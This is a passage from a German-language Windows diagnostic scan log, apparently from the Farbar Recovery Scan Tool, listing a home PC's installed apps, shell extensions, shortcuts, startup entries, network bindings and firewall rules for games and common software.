NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.962.0_x64__56jybvy8sckqj [2022-01-18] (NVIDIA Corp.)
Outlook -> C:\Program Files\WindowsApps\outlook.com-78C9D47_1.0.0.0_neutral__3t89ybq5n4y7r [2022-06-07] (outlook.com)
Spotify Music -> C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.189.862.0_x64__zpdnekdrzrea0 [2022-07-11] (Spotify AB) [Startup Task]
XING -> C:\Program Files\WindowsApps\XINGAG.XING_4.0.9.0_x86__xpfg3f7e9an52 [2021-06-04] (New Work SE)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

ContextMenuHandlers1: [SystemSpeedupFilesMenu] -> {14cb2bd0-2375-3d10-9b5d-5e18865c8959} => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.UI.ShellExtension.DLL [2022-05-09] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2020-12-01] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2020-12-01] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers4: [SystemSpeedupFoldersMenu] -> {700866bb-c8e9-3e71-b359-abb28baed0e8} => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.UI.ShellExtension.DLL [2022-05-09] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_5292bbfbf575e2d2\nvshext.dll [2021-10-07] (Nvidia Corporation -> NVIDIA Corporation)
ContextMenuHandlers5: [SystemSpeedupDesktopMenu] -> {0cab5786-30e8-3185-9b3b-ccefbf1b8afe} => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.UI.ShellExtension.DLL [2022-05-09] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2020-12-01] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2020-12-01] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Nicht auf der Ausnahmeliste) ====================

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

Shortcut: C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TeX Live 2020\TeX Live command-line.lnk -> C:\texlive\2020\tlpkg\installer\tl-cmd.bat ()
Shortcut: C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TeX Live 2020\Uninstall TeX Live.lnk -> C:\texlive\2020\tlpkg\installer\uninst.bat ()
ShortcutWithArgument: C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Excel.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe (Microsoft Corporation) ->  --profile-directory=Default --app-id=leffmjdabcgaflkikcefahmlgpodjkdm
ShortcutWithArgument: C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PowerPoint.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe (Microsoft Corporation) ->  --profile-directory=Default --app-id=opfacbhaojodjaojgocnibmklknchehf
ShortcutWithArgument: C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Word.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe (Microsoft Corporation) ->  --profile-directory=Default --app-id=hikhggiobiflkdfdgdajcfklmcibbopi
ShortcutWithArgument: C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Anaconda3 (64-bit)\Anaconda Prompt (Anaconda).lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> "/K" C:\Anaconda\Scripts\activate.bat C:\Anaconda

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

2021-01-03 21:09 - 2022-03-04 04:23 - 126965248 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libcef.dll
2021-01-03 21:09 - 2021-11-17 13:38 - 000384000 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libegl.dll
2021-01-03 21:09 - 2021-11-17 13:38 - 008006656 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libglesv2.dll
2019-10-30 18:17 - 2019-10-30 18:17 - 000368128 _____ () [Datei ist nicht signiert] C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\NSConfiguratorDaemonModule.dll
2019-10-30 18:30 - 2019-10-30 18:30 - 000230912 _____ () [Datei ist nicht signiert] C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Sonic Studio 3\ProfileSwitcherDaemonModule.dll
2020-12-14 13:53 - 2020-03-04 17:08 - 000123904 _____ (CANON INC.) [Datei ist nicht signiert] C:\Program Files (x86)\Canon\IJPLM\CNMPU.DLL
2022-06-17 19:17 - 2022-06-17 19:17 - 003864576 _____ (Newtonsoft) [Datei ist nicht signiert] C:\Windows\assembly\NativeImages_v4.0.30319_64\Newtonsoft.Json\9d6cba07e22ce2773a043f171286465c\Newtonsoft.Json.ni.dll
2021-01-03 21:09 - 2022-03-04 04:23 - 000983552 _____ (The Chromium Authors) [Datei ist nicht signiert] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\chrome_elf.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========

BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23] (Canon Inc. -> CANON INC.)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23] (Canon Inc. -> CANON INC.)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23] (Canon Inc. -> CANON INC.)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23] (Canon Inc. -> CANON INC.)

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2019-12-07 11:14 - 2019-12-07 11:12 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts

==================== Andere Bereiche ===========================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files\Oculus\Support\oculus-runtime;C:\Program Files (x86)\Razer Chroma SDK\bin;C:\Program Files\Razer Chroma SDK\bin;C:\Program Files (x86)\Razer\ChromaBroadcast\bin;C:\Program Files\Razer\ChromaBroadcast\bin;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files\MATLAB\R2020b\runtime\win64;C:\Program Files\MATLAB\R2020b\bin;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps;C:\Program Files\Microsoft SQL Server\130\Tools\Binn\;C:\Program Files\dotnet\
HKU\S-1-5-21-292222086-413629167-3624375346-1001\Control Panel\Desktop\\Wallpaper -> c:\users\chris\downloads\wallpaperflare.com_wallpaper.jpg
HKU\S-1-5-21-292222086-413629167-3624375346-1006\Control Panel\Desktop\\Wallpaper -> C:\Users\Lisa\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\20160918_124612.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
 ist aktiviert.

Network Binding:
=============
Ethernet 3: NordVPN LightWeight Firewall -> NordLwf (enabled) 
Ethernet: NordVPN LightWeight Firewall -> NordLwf (enabled) 
WLAN 2: NordVPN LightWeight Firewall -> NordLwf (enabled) 
Ethernet 2: NordVPN LightWeight Firewall -> NordLwf (enabled) 

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

HKLM\...\StartupApproved\Run: => "SecurityHealth"
HKLM\...\StartupApproved\Run: => "RTHDVCPL"
HKLM\...\StartupApproved\Run32: => "IJNetworkScannerSelectorEX2"
HKLM\...\StartupApproved\Run32: => "Avira System Speedup User Starter"
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\StartupApproved\Run: => "Energy"
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\StartupApproved\Run: => "Grammarly"
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\StartupApproved\Run: => "MicrosoftEdgeAutoLaunch_0A1E394B2107F9944ED3CB9C6839BC54"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{6E5F54F9-8B65-4754-9525-26FA264D5516}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{7A595AEF-25B1-4CAB-9643-B8192DE962FD}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{F5B55E70-AA11-4B83-8C72-AC7F44D4B2D4}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{1D1F1F15-681D-4A9C-979B-75A4714AAF10}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [TCP Query User{36DC0D70-57D9-481C-B8D1-E92A8E6159EC}C:\users\chris\downloads\_temp_matlab_r2020b_win64\bin\win64\setup.exe] => (Allow) C:\users\chris\downloads\_temp_matlab_r2020b_win64\bin\win64\setup.exe (The MathWorks, Inc. -> The MathWorks, Inc)
FirewallRules: [UDP Query User{EDD170F1-71AF-43D8-A32F-48603E3B78A7}C:\users\chris\downloads\_temp_matlab_r2020b_win64\bin\win64\setup.exe] => (Allow) C:\users\chris\downloads\_temp_matlab_r2020b_win64\bin\win64\setup.exe (The MathWorks, Inc. -> The MathWorks, Inc)
FirewallRules: [{566CF29F-1398-4AE7-A348-4647E81778BF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Among Us\Among Us.exe () [Datei ist nicht signiert]
FirewallRules: [{8380EE04-B917-4CDC-8083-49567E8B4032}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Among Us\Among Us.exe () [Datei ist nicht signiert]
FirewallRules: [{28BCA9B0-6429-49DC-8E56-4F08ED762270}] => (Allow) C:\Users\chris\AppData\Roaming\Zoom\bin\Zoom.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.)
FirewallRules: [{BF145504-A480-41E7-887E-8F4F6C7096D4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\RollerCoaster Tycoon World\RollerCoaster Tycoon World.exe () [Datei ist nicht signiert]
FirewallRules: [{D1C371C7-8E53-4506-8204-CC62654E22BA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\RollerCoaster Tycoon World\RollerCoaster Tycoon World.exe () [Datei ist nicht signiert]
FirewallRules: [{7FACFBAE-785E-4F22-8AED-0FBA306DD9B6}] => (Allow) C:\Program Files\Unity Hub\Unity Hub.exe (Unity Technologies SF -> Unity Technologies Inc.)
FirewallRules: [TCP Query User{9409833B-68ED-4D09-85C9-A2C2A6D01197}C:\program files\unity hub\unity hub.exe] => (Block) C:\program files\unity hub\unity hub.exe (Unity Technologies SF -> Unity Technologies Inc.)
FirewallRules: [UDP Query User{4D0AB641-6A16-42EE-BFF0-54120C32C9DE}C:\program files\unity hub\unity hub.exe] => (Block) C:\program files\unity hub\unity hub.exe (Unity Technologies SF -> Unity Technologies Inc.)
FirewallRules: [{3019DCD8-750F-4924-BBE5-923D668D59E1}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{9894E1FE-A27D-4BEB-92E9-36226CEAC3AA}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{00F1814D-F708-4406-8DA4-0485BB899B4C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Surge\bin\TheSurge.exe (Focus Home Interactive -> )
FirewallRules: [{19172FB5-2E19-404B-A66D-90F888B0EA43}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Surge\bin\TheSurge.exe (Focus Home Interactive -> )
FirewallRules: [{1AF03E42-ADDC-4094-9F70-EA59E2B9C46C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Grim Clicker\game.exe () [Datei ist nicht signiert]
FirewallRules: [{B4C1D0FE-4FB8-4FD7-9BC3-09DF71552373}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Grim Clicker\game.exe () [Datei ist nicht signiert]
FirewallRules: [{75870186-5C5C-422F-A549-13132E255A99}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock Remastered\Build\Final\BioshockHD.exe () [Datei ist nicht signiert]
FirewallRules: [{9AD716AA-DDE1-4F7B-84D7-40CC387FBC9E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock Remastered\Build\Final\BioshockHD.exe () [Datei ist nicht signiert]
FirewallRules: [{F6021407-F577-41A5-9F85-1C7E104CC313}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\South Park - The Stick of Truth\South Park - The Stick of Truth.exe (Obsidian Entertainment, Inc. -> Obsidian Entertainment, Inc.)
FirewallRules: [{18D9A237-7640-4007-900C-79103A8EA3CE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\South Park - The Stick of Truth\South Park - The Stick of Truth.exe (Obsidian Entertainment, Inc. -> Obsidian Entertainment, Inc.)
FirewallRules: [TCP Query User{A2C4F85E-BC68-4AD8-B8CE-09232010CB46}C:\users\lisa\appdata\local\microsoft\teams\current\teams.exe] => (Block) C:\users\lisa\appdata\local\microsoft\teams\current\teams.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{C3E1FD5F-BDA7-4010-BB7F-3F292AE26B4D}C:\users\lisa\appdata\local\microsoft\teams\current\teams.exe] => (Block) C:\users\lisa\appdata\local\microsoft\teams\current\teams.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6F07FB74-1A6A-4C75-B9D6-B70E444C4B6B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ROUNDS\Rounds.exe () [Datei ist nicht signiert]
FirewallRules: [{C6202E59-97DD-4E03-B0BD-B5B4B2332380}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ROUNDS\Rounds.exe () [Datei ist nicht signiert]
FirewallRules: [{3431ECC2-324F-4F1D-8D09-B91287380B1E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fable Anniversary\Binaries\Win32\Fable Anniversary.exe (Epic Games, Inc.) [Datei ist nicht signiert]
FirewallRules: [{3EFB3155-DFC1-46E8-A7F0-FD637DCC9D77}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fable Anniversary\Binaries\Win32\Fable Anniversary.exe (Epic Games, Inc.) [Datei ist nicht signiert]
FirewallRules: [{EE33FFD5-C09B-4260-ADC6-09CF42ECDABA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fable The Lost Chapters\Fable.exe (Lionhead) [Datei ist nicht signiert]
FirewallRules: [{28350ABE-91A3-4806-922B-CB9D8F5F0B05}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fable The Lost Chapters\Fable.exe (Lionhead) [Datei ist nicht signiert]
FirewallRules: [{C7411B7E-B949-4650-943B-317A7AB6D49C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Devil May Cry 5\DevilMayCry5.exe (CAPCOM CO., LTD. -> )
FirewallRules: [{AD827582-0CA6-4767-9980-886E4D6E0D63}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Devil May Cry 5\DevilMayCry5.exe (CAPCOM CO., LTD. -> )
FirewallRules: [{758C7DAA-F52F-436D-B314-BBD6351ED56A}] => (Allow) C:\Users\chris\AppData\Roaming\Zoom\bin\Zoom.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.)
FirewallRules: [{587FAD5E-38DF-419D-9929-95066A119ABF}] => (Allow) C:\Users\chris\AppData\Roaming\Zoom\bin\airhost.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.)
FirewallRules: [{65D3B7F0-46A5-4DB9-9937-D0758B6342F0}] => (Allow) C:\Users\chris\AppData\Roaming\Zoom\bin\airhost.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.)
FirewallRules: [{EDCD105D-DCEB-445B-94CD-7A0482A9FC06}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{6342B894-15E5-463E-A90D-AB0C4AF4E8BE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{FE131117-76DB-45F5-8E69-240A6DE1A254}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{47308446-3127-4D0F-AA64-8A4E983F0C8A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [TCP Query User{8E8AEE8C-12D6-4748-A65E-EBEEF2AD94CB}C:\program files\epic games\saintsrowthethird\srttr.exe] => (Allow) C:\program files\epic games\saintsrowthethird\srttr.exe (Koch Media GmbH, Austria) [Datei ist nicht signiert]
FirewallRules: [UDP Query User{689EB9B5-20A2-4C74-8C69-36B21CB0EEA1}C:\program files\epic games\saintsrowthethird\srttr.exe] => (Allow) C:\program files\epic games\saintsrowthethird\srttr.exe (Koch Media GmbH, Austria) [Datei ist nicht signiert]
FirewallRules: [TCP Query User{DC6BBDAF-B942-4F61-8F79-94B7E177A494}C:\users\chris\appdata\local\programs\opera gx\opera.exe] => (Allow) C:\users\chris\appdata\local\programs\opera gx\opera.exe (Opera Norway AS -> Opera Software)
FirewallRules: [UDP Query User{5AA62A8A-EF97-4A25-94BC-7C1E5524EDA3}C:\users\chris\appdata\local\programs\opera gx\opera.exe] => (Allow) C:\users\chris\appdata\local\programs\opera gx\opera.exe (Opera Norway AS -> Opera Software)
FirewallRules: [{189AA38B-31D2-4640-B67E-DD1A9FE42A67}] => (Block) C:\users\chris\appdata\local\programs\opera gx\opera.exe (Opera Norway AS -> Opera Software)
FirewallRules: [{F67E4C44-3037-43ED-BB74-5C03B0C43C59}] => (Block) C:\users\chris\appdata\local\programs\opera gx\opera.exe (Opera Norway AS -> Opera Software)
FirewallRules: [TCP Query User{0E5265BF-B6A2-4EFD-A445-B5123ACE55F2}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [UDP Query User{30954229-0783-41F5-81B8-2D5215D69B0C}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [TCP Query User{558D676D-3CEF-4305-9C46-137F78254B0C}C:\program files\matlab\r2020b\bin\win64\update_installer.exe] => (Allow) C:\program files\matlab\r2020b\bin\win64\update_installer.exe (The MathWorks, Inc. -> The MathWorks, Inc)
FirewallRules: [UDP Query User{90E8D71F-C408-4BAA-9E07-F137A5878802}C:\program files\matlab\r2020b\bin\win64\update_installer.exe] => (Allow) C:\program files\matlab\r2020b\bin\win64\update_installer.exe (The MathWorks, Inc. -> The MathWorks, Inc)
FirewallRules: [{04CC0A2A-09B9-45CF-BE8E-6045F073561C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Vampire Survivors\VampireSurvivors.exe (Luca Galante) [Datei ist nicht signiert]
FirewallRules: [{0A36567B-ADC2-4EBC-B83D-26F014D71228}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Vampire Survivors\VampireSurvivors.exe (Luca Galante) [Datei ist nicht signiert]
FirewallRules: [{C5B1ACAE-081D-4D6F-8081-E99BA295BB96}] => (Allow) C:\Program Files\Oculus\Support\oculus-runtime\OVRRedir.exe (Oculus VR, LLC -> Facebook Technologies, LLC)
FirewallRules: [{275436BE-C77F-4DA6-A5EA-592269522A71}] => (Allow) C:\Program Files\Oculus\Support\oculus-runtime\OVRRedir.exe (Oculus VR, LLC -> Facebook Technologies, LLC)
FirewallRules: [{AA42BBC7-86D7-4551-B362-DD99A2B1B6E1}] => (Allow) C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe (Oculus VR, LLC -> Facebook Technologies, LLC)
FirewallRules: [{2D82E713-AC11-4002-8130-EA293FC734CD}] => (Allow) C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe (Oculus VR, LLC -> Facebook Technologies, LLC)
FirewallRules: [{6060EEFE-CE3B-4870-8A3E-5B8FA663806B}] => (Allow) C:\Program Files\Oculus\Support\oculus-runtime\OVRServer_x64.exe (Oculus VR, LLC -> Facebook Technologies, LLC)
FirewallRules: [{4F32F17B-B2CA-48E7-98F1-9D0E4E52892B}] => (Allow) C:\Program Files\Oculus\Support\oculus-runtime\OVRServer_x64.exe (Oculus VR, LLC -> Facebook Technologies, LLC)
FirewallRules: [{3AA10CEF-2B00-406F-9AB8-F3380837C1DA}] => (Allow) C:\Program Files\Oculus\Support\oculus-dash\dash\bin\OculusDash.exe (Oculus VR, LLC -> )
FirewallRules: [{A1A5B414-F013-4991-AC2C-20431411DC6E}] => (Allow) C:\Program Files\Oculus\Support\oculus-dash\dash\bin\OculusDash.exe (Oculus VR, LLC -> )
FirewallRules: [{84493D64-9A52-43C0-8B32-DDB10C0386A6}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Home2.exe (Epic Games, Inc.) [Datei ist nicht signiert]
FirewallRules: [{C7C57FC4-B100-4B17-91D5-971EAD03156B}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Home2.exe (Epic Games, Inc.) [Datei ist nicht signiert]
FirewallRules: [{487F3331-75F1-43B5-BD9A-86B90DC051AE}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Home2\Binaries\Win64\Home2-Win64-Shipping.exe (Oculus VR, LLC -> Epic Games, Inc.)
FirewallRules: [{87A87970-B5FA-4889-B2E7-7BDD794CFC04}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Home2\Binaries\Win64\Home2-Win64-Shipping.exe (Oculus VR, LLC -> Epic Games, Inc.)
FirewallRules: [{80061A74-1C06-4B75-8318-1FB070164909}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Engine\Binaries\Win64\UnrealCEFSubProcess.exe (Epic Games, Inc.) [Datei ist nicht signiert]
FirewallRules: [{8929D4DE-316A-4F79-982A-CFF76C4B3326}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Engine\Binaries\Win64\UnrealCEFSubProcess.exe (Epic Games, Inc.) [Datei ist nicht signiert]
FirewallRules: [{D788E8D5-9332-4A63-81F0-389C1FB5720B}] => (Allow) C:\Program Files\Oculus\Support\oculus-client\OculusClient.exe (Oculus VR, LLC) [Datei ist nicht signiert]
FirewallRules: [{2246D279-8C14-431E-B2D8-28FF620BC549}] => (Allow) C:\Program Files\Oculus\Support\oculus-client\OculusClient.exe (Oculus VR, LLC) [Datei ist nicht signiert]
FirewallRules: [{4AD54096-F2A7-4D4F-AE0E-665EF3326C87}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe (Even Balance, Inc. -> )
FirewallRules: [{36CE473C-E3EC-4E0B-9F13-79F350081FE4}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe (Even Balance, Inc. -> )
FirewallRules: [{8F8DFD5C-AB27-49FC-ABB3-765BD92CC7DD}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe (Even Balance, Inc. -> )
FirewallRules: [{7089201C-1E10-4AAD-B22A-DFB35197680B}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe (Even Balance, Inc. -> )
FirewallRules: [TCP Query User{311EABD7-64FF-486C-9B94-89044B596569}C:\program files (x86)\ubisoft\ubisoft game launcher\games\far cry 3\bin\farcry3.exe] => (Block) C:\program files (x86)\ubisoft\ubisoft game launcher\games\far cry 3\bin\farcry3.exe (Ubisoft Entertainment -> Ubisoft Entertainment)
FirewallRules: [UDP Query User{61DB55BA-1818-4F6A-A9D9-C8BC5F682046}C:\program files (x86)\ubisoft\ubisoft game launcher\games\far cry 3\bin\farcry3.exe] => (Block) C:\program files (x86)\ubisoft\ubisoft game launcher\games\far cry 3\bin\farcry3.exe (Ubisoft Entertainment -> Ubisoft Entertainment)
FirewallRules: [TCP Query User{E35D8C88-AB1C-4B27-9029-F79A5B72A616}C:\program files (x86)\ubisoft\ubisoft game launcher\games\far cry 3\bin\farcry3_d3d11.exe] => (Allow) C:\program files (x86)\ubisoft\ubisoft game launcher\games\far cry 3\bin\farcry3_d3d11.exe (Ubisoft Entertainment -> Ubisoft Entertainment)
FirewallRules: [UDP Query User{149C4308-303D-4EF9-AB12-D3EB608CC03B}C:\program files (x86)\ubisoft\ubisoft game launcher\games\far cry 3\bin\farcry3_d3d11.exe] => (Allow) C:\program files (x86)\ubisoft\ubisoft game launcher\games\far cry 3\bin\farcry3_d3d11.exe (Ubisoft Entertainment -> Ubisoft Entertainment)
FirewallRules: [TCP Query User{56D16A80-4032-4AC4-826A-E23EBD8211E0}C:\program files (x86)\ubisoft\ubisoft game launcher\games\far cry 3\bin\fc3editor.exe] => (Allow) C:\program files (x86)\ubisoft\ubisoft game launcher\games\far cry 3\bin\fc3editor.exe (Ubisoft Entertainment -> Ubisoft)
FirewallRules: [UDP Query User{2867835A-322B-48A3-B015-E407FBFFE704}C:\program files (x86)\ubisoft\ubisoft game launcher\games\far cry 3\bin\fc3editor.exe] => (Allow) C:\program files (x86)\ubisoft\ubisoft game launcher\games\far cry 3\bin\fc3editor.exe (Ubisoft Entertainment -> Ubisoft)
FirewallRules: [{80DC1F30-3BBF-4613-B9D0-7B30502FC56E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Leaf Blower Revolution\game.exe (Humble North) [Datei ist nicht signiert]
FirewallRules: [{E4BD6053-8483-4B01-9108-EC63654EE801}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Leaf Blower Revolution\game.exe (Humble North) [Datei ist nicht signiert]
FirewallRules: [{58AB8156-9FE7-4FF2-9893-D72CD1646A96}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sakura Clicker\Sakura Clicker.exe (Winged Cloud) [Datei ist nicht signiert]
FirewallRules: [{997F4884-943C-4020-83C2-94E407CA41A1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sakura Clicker\Sakura Clicker.exe (Winged Cloud) [Datei ist nicht signiert]
FirewallRules: [TCP Query User{C902F744-EF81-42C8-AED3-7522248583E2}C:\users\chris\appdata\roaming\energy\energy.exe] => (Allow) C:\users\chris\appdata\roaming\energy\energy.exe (Energy ltd) [Datei ist nicht signiert]
FirewallRules: [UDP Query User{243259EC-3F80-47A6-B20C-7714F71936A2}C:\users\chris\appdata\roaming\energy\energy.exe] => (Allow) C:\users\chris\appdata\roaming\energy\energy.exe (Energy ltd) [Datei ist nicht signiert]
FirewallRules: [TCP Query User{B3836A9E-3093-40E3-97C6-3FEF00029A95}C:\users\chris\appdata\roaming\energy\energy.exe] => (Block) C:\users\chris\appdata\roaming\energy\energy.exe (Energy ltd) [Datei ist nicht signiert]
